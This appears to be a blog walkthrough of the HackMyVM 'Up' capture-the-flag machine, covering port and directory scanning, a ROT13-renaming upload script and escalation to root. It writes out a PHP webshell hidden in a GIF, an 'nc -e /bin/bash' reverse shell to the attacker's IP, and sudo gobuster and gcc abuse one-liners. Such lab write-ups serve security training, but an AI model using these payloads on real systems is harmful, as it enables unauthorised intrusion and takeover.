Pepster'Blog
HackMyVM-Up靶机详解WP
城南花已开 Lv5
  2024-12-10 21:04:36   2025-01-22 19:49:12    1.4k 字  7 分钟  

信息收集

服务探测

最近新出的easy,好久没打了练练手,只看到有个80端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
❯ ip=192.168.56.111
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.111:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-10 20:59 CST
Initiating Ping Scan at 20:59
Scanning 192.168.56.111 [4 ports]
Completed Ping Scan at 20:59, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:59
Completed Parallel DNS resolution of 1 host. at 20:59, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:59
Scanning 192.168.56.111 [1 port]
Discovered open port 80/tcp on 192.168.56.111
Completed SYN Stealth Scan at 20:59, 0.04s elapsed (1 total ports)
Nmap scan report for 192.168.56.111
Host is up, received reset ttl 63 (0.00041s latency).
Scanned at 2024-12-10 20:59:25 CST for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 5 (196B) | Rcvd: 2 (84B)

image

大概率是个文件上传漏洞吧,试着传个木🐎上去,文件改个后缀就能上传成功,基本没有防护

但是文件存在哪呢?我下意识的/uploads结果给个提示

image

那行不惯着你,扫一下目录瞅瞅有啥收获的信息

在uploads子目录下扫到一个robots.txtclue.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
❯ gobuster dir -u $ip/uploads -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x .txt,.html,.php, -t 20 -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.111/uploads
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,php,
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/robots.txt           (Status: 200) [Size: 1301]
/clue.txt             (Status: 200) [Size: 17]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

访问robots.txt得到一段base64编码后的,解码后好像时php的源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $targetDir = "uploads/";
    $fileName = basename($_FILES["image"]["name"]);
    $fileType = pathinfo($fileName, PATHINFO_EXTENSION);
    $fileBaseName = pathinfo($fileName, PATHINFO_FILENAME);

    $allowedTypes = ['jpg', 'jpeg', 'gif'];
    if (in_array(strtolower($fileType), $allowedTypes)) {
        $encryptedFileName = strtr($fileBaseName, 
            'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz', 
            'NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm');

        $newFileName = $encryptedFileName . "." . $fileType;
        $targetFilePath = $targetDir . $newFileName;

        if (move_uploaded_file($_FILES["image"]["tmp_name"], $targetFilePath)) {
            $message = "El archivo se ha subido correctamente.";
        } else {
            $message = "Hubo un error al subir el archivo.";
        }
    } else {
        $message = "Solo se permiten archivos JPG y GIF.";
    }
}
?>

从源码中得知,上传文件后会将文件重命名为编码后的名字加源格式,简单看了下是Rot13加密

我之前上传的是php-reverse-shell.jpg不包含.jpg将前面的进行Rot13编码后得到cuc-erirefr-furyy

image

虽然说可以正常访问,但是图片不会被解析,显示是个破碎的图片

尝试换Gif的图片,前面加上一句话木马<?=$_GET[0]?>

image

Gif可以被正常解析,命令也能执行,那就反弹个shell

eri.gif?0nc+-e+/bin/bash+192.168.56.102+4444

用户提权

1
2
3
4
5
6
7
8
www-data@debian:/var/www/html/uploads$ sudo -l
Matching Defaults entries for www-data on debian:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User www-data may run the following commands on debian:
    (ALL) NOPASSWD: /usr/bin/gobuster

拿到shell后,发现www-data用户有sudo权限,可以使用gobuster,可如何利用这个工具读取文件或者提权呢

之前还扫到一个clue.txt还没看过,果然是个小Tips

1
2
❯ curl $ip/uploads/clue.txt
/root/rodgarpass

大概率就是通过gobuster进行读取这个rodgarpass文件了

不过gobuster扫本地不会出结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
www-data@debian:/tmp$ sudo /usr/bin/gobuster dir -u 127.0.0.1 -w /root/rodgarpass
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://127.0.0.1
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /root/rodgarpass
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2024/12/10 16:08:30 Starting gobuster in directory enumeration mode
===============================================================

===============================================================
2024/12/10 16:08:30 Finished
===============================================================
www-data@debian:/tmp$

尝试在kali中启动一个简易的http服务,用靶机扫kali

看一下日志,得到一个字符串b45cffe084dd3d20d928bee85e7b0f2

1
2
3
4
5
┌──(kali㉿kali)-[~]
└─$ cat /var/log/nginx/access.log
192.168.56.111 - - [10/Dec/2024:09:11:39 -0500] "GET / HTTP/1.1" 403 125 "-" "gobuster/3.5"
192.168.56.111 - - [10/Dec/2024:09:11:39 -0500] "GET /d0c460a5-4e8a-4e26-a354-c4de0ee92dc7 HTTP/1.1" 404 125 "-" "gobuster/3.5"
192.168.56.111 - - [10/Dec/2024:09:11:39 -0500] "GET /b45cffe084dd3d20d928bee85e7b0f2 HTTP/1.1" 404 125 "-" "gobuster/3.5"

疑似md5加密后的字符串,不过这串字符串只有31位,正常md5是32位的

1
2
3
┌──(kali㉿kali)-[~]
└─$ echo -n "b45cffe084dd3d20d928bee85e7b0f2" |wc -c
31

出题日故意缺了一位还是有bug就不知道了

不过少一位,通过在线md5解密也能解出来,

不过这string并不是rodgar的密码

image

补上缺的那一位,密码就是这32位的md5字符串

1
2
3
┌──(kali㉿kali)-[~]
└─$ echo -n "string"|md5sum|awk '{print $1}'
b45cffe084dd3d20d928bee85e7b0f21

用这个密码切换到rodgar用户,这样就拿到user了

1
2
3
4
5
6
7
www-data@debian:/home$ su rodgar
Password:
rodgar@debian:/home$ cd rodgar/
rodgar@debian:~$ ls
user.txt
rodgar@debian:~$ cat user.txt
b45cffe084dd3d20d928bee

Root提权

用户有sudo权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
rodgar@debian:/home$ sudo -l
Matching Defaults entries for rodgar on debian:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User rodgar may run the following commands on debian:
    (ALL : ALL) NOPASSWD: /usr/bin/gcc, /usr/bin/make
rodgar@debian:/home$ sudo gcc -wrapper /bin/sh,-s .
# id
uid=0(root) gid=0(root) grupos=0(root)
# cd ~
# ls
rodgarpass  rooo_-tt.txt
# cat rooo_-tt.txt
44b3f261e197124e60217d6ffe7e71a8e0175ae0
  1. 信息收集
    1. 服务探测
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k
  1. 信息收集
    1. 服务探测
  2. 用户提权
  3. Root提权